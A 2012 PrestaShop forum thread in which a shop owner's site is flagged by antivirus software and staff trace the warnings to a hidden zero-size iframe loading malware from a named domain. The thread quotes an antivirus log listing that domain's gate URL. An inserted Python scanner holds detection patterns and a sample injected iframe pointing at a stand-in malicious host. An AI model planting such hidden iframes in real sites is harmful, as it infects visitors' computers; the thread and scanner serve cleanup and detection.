ceostos Posted January 20, 2012

Hello,

When my clients try to access my website, they receive an antivirus warning, meaning that within my website there are possible viruses that can infect their computer, creating a little panic for them to come back. Can anyone help me fix this issue ASAP?

Thanks,
Carlos

Mike Kranzler Posted January 20, 2012

Hi Carlos,

Can you please post your URL so that we can look into this for you?

-Mike

ceostos Posted January 20, 2012

www.amsigroup.com

Mike Kranzler Posted January 20, 2012

I just took a look at this, and I'm not getting any warnings at all; everything looks fine on our end. Do you have any idea of how I could replicate this error, or a screenshot or screencast from one of your customers who is getting this warning?

-Mike

ceostos Posted January 20, 2012

Hi Mike,

I do not have a copy of it; however, my customers are stating the issue. Most of them use McAfee as their antivirus software, and according to them the message is like "Website not safe". I do not receive the message either, but I do not know if this has to do with the type of antivirus. If I happen to receive another message from my customers, I will try to have them send me a screenshot of the message.

Mike Kranzler Posted January 20, 2012

Please do so, because we don't have any way of identifying the error otherwise, as nothing is setting off alarms over here. It likely isn't any sort of real issue, but I understand why it could make your customers uncomfortable and will be happy to help you try to find the resolution.

-Mike

ceostos Posted January 20, 2012

Hi Mike,

This is the information which one of my clients is receiving from his antivirus when he accesses the website:

Web Anti-Virus
--------------
Total scanned: 7579
Detected: 5
Start time: 20/01/2012 08:19:40 a.m.
Duration: 05:32:07

Detected
--------
Status                                        Object
------                                        ------
detected: virus HEUR:Trojan.Script.Iframer    file: http://amsigroup.com/modules/homecarousel/homecarousel.js
detected: virus HEUR:Trojan.Script.Iframer    file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js
detected: virus HEUR:Trojan.Script.Iframer    file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js
detected: malware                             URL: http://unclesammm.com/gate.php?f=871051
detected: malware                             URL: http://unclesammm.com/gate.php?f=871051&r=http%3A//www.google.com.pe/url%3Fsa%3Dt%26rct%3Dj%26q%3Damsigroup%26source%3Dweb%26cd%3D3%26ved%3D0CCwQFjAC%26url%3Dhttp%253A%252F%252Famsigroup.com%252F%26ei%3DIIoZT5utLpDrggf-pOyCDA%26usg%3DAFQjCNHT2gzYsSH7U-jLlFov_KLGFVpDEg%26sig2%3DcelyAkEI5Me4_T-gL8_jfA

Settings
--------
Parameter                                                              Value
---------                                                              -----
Security Level                                                         Recommended
Action                                                                 Block
Check if URLs are listed in the base of suspicious web addresses      Yes
Check if URLs are listed in the base of phishing web addresses        Yes
Heuristic analyzer level                                               Medium
Fragment caching timeout                                               1 sec

Please let me know what we can do to fix it.

Thanks so much for your help,
Carlos

Mike Kranzler Posted January 20, 2012

Hi Carlos,

I am passing this along to our development team, who will look into this for you. I will let you know as soon as I have any additional information.

-Mike

ceostos Posted January 20, 2012

Thank you Mike,

I would really appreciate a prompt solution to this problem since I have been receiving a lot of complaints now.

Carlos

Mike Kranzler Posted January 20, 2012

When did the complaints start exactly? And had you made any changes, additions or new module purchases right before then?

-Mike

ceostos Posted January 20, 2012

The complaints started happening last week, but I did not pay that much attention since it was so random and coming from one of my employees, but now I see it coming more and more frequently. I purchased the newsletter module, but I don't think it is related to the virus.

Thanks Mike for anything you can do to help me solve this issue.

Carlos

Mike Kranzler Posted January 20, 2012

Which newsletter module specifically? And where did you purchase it?

-Mike

ceostos Posted January 20, 2012

deep newsletter prestashop

Mike Kranzler Posted January 20, 2012

I looked into this a little deeper for you, and it does appear that somehow your site has been infected with malware from a site called unclesammm DOT com. This isn't a site that has ever caused one of our users issues in the past, so unfortunately I don't know what to suggest at the moment other than backing up everything and trying a clean reinstall. As I mentioned, I am passing this along to our development team, but I don't know how quickly they'll be able to come back with a response; it really depends on how this may have happened in the first place.

You can see where I found the vulnerability below:

You'll see that it presents as a hidden iframe with dimensions of 0 x 0 in the corner of your site, so it is not really intended to be found very easily. I will let you know as soon as I have any additional information on this for you.

-Mike

ceostos Posted January 20, 2012

How can I back up the information and reinstall the system? I purchased the template a month ago through monstertemplates.com, which included the installation of the website. I do not have enough computer knowledge to do all this. Do you know how I can reinstall the template? I would like to take quick action so I can have my website ready again for my clients.

Thanks,
Carlos

Mike Kranzler Posted January 20, 2012

Hi Carlos,

You can back up your database through your Back Office by going to Tools > DB Backup. You can also back up all of your files by copying them to your desktop via FTP, and then compressing them all into a zipped folder to save room, but be careful with that, because the unclesammm code is likely inside of one of those files and you wouldn't want to add it again.

And I'm assuming you mean templatemonster.com; they would be the best ones to contact to get help with their template again.

-Mike

Carolina Custom Designs Posted January 21, 2012

Hi Carlos & Mike!

Something very similar to this happened to my site about a month ago. It was very painful to deal with and my site was down nearly a week. I highly recommend you disable your site, because if Google crawls your site they will blacklist your site and it is very hard to get that removed. I was finally able to get rid of the malicious script on my site, but it cost me a bunch of time (and probably business). I learned a lot going through that process and would be happy to help if needed.

Marty Shue

Mike Kranzler Posted January 23, 2012

As always, thanks Marty! Do you have any idea where you may have picked up that script in the first place?

-Mike

Carolina Custom Designs Posted January 23, 2012

No, we were never able to determine where or how the script managed to get on my server. I worked with my web host but we could not determine where it came from. It infected my whole server and each of my 4 sites. Basically, we had to manually go through each file and remove the script. The malicious script I had would regenerate itself upon page load if you missed any part of the script. This was very frustrating! I would get one site clean only to come back an hour or so later to find that it had been infected again. We finally found and removed all the scripts but, as I said, it took a lot of time and effort.

Marty Shue

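The file-by-file search described in the posts above can be scripted against a local copy of the shop's files. This is an added example, not code from any poster or from PrestaShop; it flags <iframe> tags that are zero-sized, CSS-hidden, or loaded from a host outside an allowlist. The sample strings and the shop.example and malicious.example hosts are constructed placeholders.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

SCAN_SUFFIXES = {".js", ".php", ".tpl", ".html", ".htm"}
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# An optional backslash covers tags embedded in JavaScript strings (src=\"...\").
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?["']?([^"'\s>\\]+)""", re.I)
# width/height of 0 as an attribute or inline style; skips border-width, 0.5, 0%.
ZERO_DIM_RE = re.compile(
    r"""(?<![-\w])(?:width|height)\s*[=:]\s*\\?["']?\s*0(?:px)?(?![\w.%])""", re.I)
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def scan_text(text, allowed_hosts):
    """Return (line_no, reasons, host) for each suspicious <iframe> in text."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        host = (urlparse(src.group(1)).hostname or "") if src else ""
        reasons = []
        if ZERO_DIM_RE.search(tag) or HIDDEN_CSS_RE.search(tag):
            reasons.append("hidden")
        if host and host not in allowed_hosts:
            reasons.append("offsite")
        if reasons:
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((line_no, reasons, host))
    return findings


def scan_tree(root, allowed_hosts):
    """Scan every script/template file under root; map relative path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_text(text, allowed_hosts)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed samples, not taken from the infected site.
SAMPLE_JS = (
    "function initCarousel() { return true; }\n"
    "var w = 100;\n"
    "document.write('<iframe src=\"http://malicious.example/gate.php\" "
    "width=\"0\" height=\"0\" frameborder=\"0\"></iframe>');\n"
)
SAMPLE_OK = '<iframe src="/modules/map/view.php" width="400" height="300"></iframe>'

if __name__ == "__main__":
    print(scan_text(SAMPLE_JS, {"shop.example", "www.shop.example"}))
```

Injected code that is obfuscated will not contain a literal <iframe> tag, so a clean result here does not clear a file; comparing each module file with a known-good copy catches what this pattern match misses.
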
Mike Kranzler Posted January 23, 2012

Wow, well I'm glad you were able to finally fix it!

Carlos, Marty is one of our PrestaShop Certified Developers, so he is definitely someone you can count on to help you out with your site.

-Mike

ceostos Posted January 23, 2012

Hi Marty,

Can you please help me? I must let you know that I do not have any experience in coding or fixing computing issues of any nature. I would really appreciate it if you can walk me through this issue at your earliest convenience.

Thank you Mike for following up with my current issue.

Thanks,
Carlos

ceostos Posted January 28, 2012

To whom it may concern,

I am still waiting for someone to help me with this virus situation. I still haven't been able to use my website due to the virus, and it has already been more than a week that I have been trying to have someone help me fix this problem. Any help is truly appreciated.

Thanks,
Carlos

jamieshankland Posted January 29, 2012

A similar thing happened to me: my website was hacked and they installed some sort of script, and Google was picking it up as containing viruses. I never did get to the bottom of it, but maybe it's a case of this?

Mike Kranzler Posted January 30, 2012

Hi Jamie,

What version of PrestaShop are you running?

-Mike